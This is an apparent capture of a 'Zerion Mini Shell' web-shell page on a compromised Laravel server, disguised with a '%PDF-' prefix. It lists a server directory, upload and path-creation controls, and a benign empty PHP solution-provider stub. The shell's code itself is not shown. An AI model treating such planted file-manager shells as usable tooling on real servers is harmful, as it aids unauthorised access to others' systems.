%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/loslex/demo/vendor/spatie/laravel-ignition/src/Commands/stubs/
Upload File :
Create Path :
Current File : /www/loslex/demo/vendor/spatie/laravel-ignition/src/Commands/stubs/solution-provider.stub

<?php

namespace DummyNamespace;

use Spatie\Ignition\Contracts\HasSolutionsForThrowable;
use Throwable;

class DummyClass implements HasSolutionsForThrowable
{
    public function canSolve(Throwable $throwable): bool
    {
        return false;
    }

    public function getSolutions(Throwable $throwable): array
    {
        return [];
    }
}

Zerion Mini Shell 1.0